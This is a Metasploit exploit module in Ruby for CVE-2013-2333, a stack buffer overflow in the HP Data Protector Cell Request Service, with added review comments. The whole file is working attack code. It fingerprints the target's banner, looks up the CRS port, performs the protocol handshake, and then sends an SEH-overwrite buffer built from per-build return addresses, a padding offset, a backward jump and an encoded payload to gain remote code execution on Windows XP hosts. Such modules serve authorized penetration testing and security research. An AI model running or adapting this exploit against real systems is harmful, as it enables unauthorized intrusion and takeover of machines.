Path: blob/master/modules/exploits/windows/misc/hp_dataprotector_crs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the HP Data Protector Cell Request Service (crs.exe)
# stack buffer overflow referenced below as CVE-2013-2333.
#
# Flow as implemented here:
#   1. get_fingerprint - reads the product banner from TCP/5555
#   2. get_crs_port    - asks the same service (opcode 2) where CRS listens
#   3. exploit         - talks to CRS directly (opcodes 0, 225, then 211)
#
# Every wire message is UTF-16LE, framed by build_pkt. The 'check' method
# is banner-based only; it never sends the overflow.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Module metadata. Each concrete target carries the per-build pop/pop/ret
  # address ('Ret') and the distance from the start of the overflowed buffer
  # to the SEH record ('Offset'). Target 0 ('Automatic') is resolved to one
  # of the concrete targets by get_target at exploit time.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HP Data Protector Cell Request Service Buffer Overflow',
      'Description' => %q{
        This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector
        product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell
        Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested
        successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.
      },
      'Author' =>
        [
          'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2013-2333' ],
          [ 'OSVDB', '93867' ],
          [ 'BID', '60309' ],
          [ 'ZDI', '13-130' ]
        ],
      'Privileged' => true,
      'Payload' =>
        {
          'Space' => 4096,
          'BadChars' => "\x00\xff\x20" # "\x00\x00", "\xff\xff" and "\x20\x00" not allowed
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', {} ],
          [ 'HP Data Protector 6.20 build 370 / Windows XP SP3',
            {
              'Ret' => 0x00436fe2, # ppr from crs.exe
              'Offset' => 15578
            }
          ],
          [ 'HP Data Protector 7.00 build 72 / Windows XP SP3',
            {
              'Ret' => 0x004cf8c1, # ppr from crs.exe
              'Offset' => 15578
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2013-06-03'))

    deregister_options('RPORT') # The CRS service runs on a random port
  end

  # Serializes one message for the Data Protector services.
  #
  # fields: ordered Hash of name => value. Field names are never sent, only
  # the values in insertion order. Each value is converted to UTF-16LE and
  # terminated with two NUL bytes, except the value under the "Payload" key,
  # which is appended as raw bytes (it is already the final byte sequence).
  # Values are joined by a UTF-16LE space.
  #
  # Returns a 4-byte big-endian length prefix followed by the BOM-led body.
  def build_pkt(fields)
    data = "\xff\xfe" # BOM Unicode
    fields.each do |k, v|
      if k == "Payload"
        data << "#{v}\x00\x00" # raw bytes, no re-encoding
      else
        data << "#{Rex::Text.to_unicode(v)}\x00\x00"
      end
      data << Rex::Text.to_unicode(" ") # Separator
    end

    data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
    data << "\x00\x00" # Ending
    return [data.length].pack("N") + data
  end

  # Reads the product banner from the service on TCP/5555 by sending 64
  # random uppercase letters and capturing whatever comes back.
  #
  # Returns the banner as ASCII with the last character and trailing newline
  # removed, or nil when the service sends nothing.
  #
  # NOTE(review): connect(false, ...) returns a socket that is not stored as
  # the module's global sock, so the bare `disconnect` below is not expected
  # to close `ommni` — confirm against the Tcp mixin; `disconnect(ommni)`
  # would close it explicitly.
  def get_fingerprint
    ommni = connect(false, {'RPORT' => 5555})
    ommni.put(rand_text_alpha_upper(64))
    resp = ommni.get_once(-1)
    disconnect

    if resp.nil?
      return nil
    end

    return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl
  end

  # Asks the service on TCP/5555 (opcode 2) which port the CRS listens on.
  #
  # The reply is expected to be framed like build_pkt output: a 32-bit
  # length, a 16-bit BOM, then space-separated UTF-16LE fields whose first
  # value is opcode "109" and whose second value is the port number.
  #
  # Returns the port as an Integer, or nil when there is no reply or the
  # reply has an unexpected shape (reason reported via vprint_error).
  # Note that a non-numeric port field yields 0 from to_i, not nil.
  def get_crs_port

    pkt = build_pkt({
      "Opcode" => "2",
      "FakeMachineName" => rand_text_alpha(8),
      "Unknown1" => "0",
      "FakeDomainUser" => rand_text_alpha(8),
      "FakeDomain" => rand_text_alpha(8),
      "FakeLanguage" => rand_text_alpha(8),
      "Unknown2" => "15"
    })
    ommni = connect(false, {'RPORT' => 5555}) # same non-global socket pattern as get_fingerprint
    ommni.put(pkt)
    resp = ommni.get_once(-1)
    disconnect

    if resp.nil?
      return nil
    end

    # Only res_data is used; the length prefix is not checked against resp.length.
    res_length, bom_unicode, res_data = resp.unpack("Nna*")

    fields = res_data.split(Rex::Text.to_unicode(" "))

    opcode = fields[0]
    port = fields[1]

    if not opcode or not port
      vprint_error("Unexpected response")
      return nil
    end

    # Strip the two-byte terminator before converting back to ASCII.
    opcode = Rex::Text.to_ascii(opcode.chomp("\x00\x00"))

    if opcode != "109"
      vprint_error("Unexpected opcode #{opcode} in the response")
      return nil
    end

    port = Rex::Text.to_ascii(port.chomp("\x00\x00"))
    return port.to_i
  end

  # Version check based solely on the TCP/5555 banner.
  #
  # Banners matching the listed A.06.20 / A.06.21 / A.07.00 / A.07.01
  # patterns are reported as Appears; the two exact builds that also have a
  # configured target are matched first. Any other banner is reported as
  # Safe rather than Detected, even when a CRS port was found. The CRS port
  # lookup here only affects the status output.
  def check
    fingerprint = get_fingerprint

    if fingerprint.nil?
      vprint_error("Unable to fingerprint")
      return Exploit::CheckCode::Unknown
    end

    port = get_crs_port

    if port.nil?
      vprint_status("HP Data Protector version #{fingerprint}")
      vprint_error("But CRS port not found")
    else
      vprint_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}")
    end

    if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/
      # More likely to be exploitable
      return Exploit::CheckCode::Appears
    elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/
      # More likely to be exploitable
      return Exploit::CheckCode::Appears
    elsif fingerprint =~ /HP Data Protector A\.07\.00/
      return Exploit::CheckCode::Appears
    elsif fingerprint =~ /HP Data Protector A\.07\.01/
      return Exploit::CheckCode::Appears
    elsif fingerprint =~ /HP Data Protector A\.06\.20/
      return Exploit::CheckCode::Appears
    elsif fingerprint =~ /HP Data Protector A\.06\.21/
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Resolves the 'Automatic' target from the banner.
  #
  # Only the two exact builds with known 'Ret'/'Offset' values resolve
  # (targets[1] and targets[2]). Every other banner — including versions that
  # check reports as Appears — yields nil, so exploit then aborts with
  # Failure::NoTarget.
  def get_target
    fingerprint = get_fingerprint

    if fingerprint.nil?
      return nil
    end

    if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/
      return targets[1]
    elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/
      return targets[2]
    else
      return nil
    end
  end

  # Exploit entry point.
  #
  # 1. Resolve the target (banner-based when 'Automatic' is selected).
  # 2. Locate the CRS port and connect to it; this connection is the
  #    module's global sock used for the rest of the method.
  # 3. Opcode 0 handshake; aborts unless the reply contains "NT-5.1", the
  #    Windows XP kernel version string the module is restricted to.
  # 4. Opcode 225.
  # 5. Opcode 211 carrying the overflow buffer: encoded payload, random
  #    padding up to 'Offset', the SEH record, a backwards jump to the start
  #    of the buffer, then 100 random bytes to trigger the exception.
  def exploit

    if target.name =~ /Automatic/
      print_status("Trying to find the target version...")
      my_target = get_target
    else
      my_target = target
    end

    if my_target.nil?
      fail_with(Failure::NoTarget, "Failed to autodetect target")
    end

    print_status("Trying to find the CRS service port...")
    port = get_crs_port
    if port.nil?
      fail_with(Failure::NotFound, "The CRS service has not been found.")
    else
      print_good("CRS service found on #{port}/TCP")
      connect(true, {'RPORT' => port}) # global sock from here on
    end

    pkt = build_pkt({
      "Opcode" => "0",
      "EndPoint" => "GUICORE",
      "ClientFingerprint" => "HP OpenView OmniBack II A.06.20",
      "FakeUsername" => rand_text_alpha(8),
      "FakeDomain" => rand_text_alpha(8),
      "Unknown1" => "488",
      "Unknown2" => rand_text_alpha(8)
    })
    print_status("Sending packet with opcode 0...")
    sock.put(pkt)
    data = sock.get_once(-1)

    if data.nil?
      fail_with(Failure::Unknown, "Error while communicating with the CRS Service")
    end

    # The configured 'Ret' addresses are only valid for the XP builds listed in 'Targets'.
    if Rex::Text.to_ascii(data) !~ /NT-5\.1/
      fail_with(Failure::NoTarget, "Exploit only compatible with Windows XP targets")
    end

    pkt = build_pkt({
      "Opcode" => "225"
    })
    print_status("Sending packet with opcode 225...")
    sock.put(pkt)
    data = sock.get_once(-1)

    if data.nil?
      fail_with(Failure::Unknown, "Error while communicating with the CRS Service")
    end

    # Buffer layout: [payload][padding to Offset][SEH record][jmp back][100 bytes]
    bof = payload.encoded
    bof << rand_text(my_target["Offset"] - payload.encoded.length)
    bof << generate_seh_record(my_target.ret)
    # Offset + 8 covers the padding plus the 8-byte SEH record, landing on the payload start.
    bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{my_target['Offset']+8}").encode_string
    bof << rand_text(100) # Trigger Exception

    pkt = build_pkt({
      "Opcode" => "211",
      "Payload" => bof
    })
    print_status("Sending malicious packet with opcode 211...")
    sock.put(pkt)
    disconnect
  end
end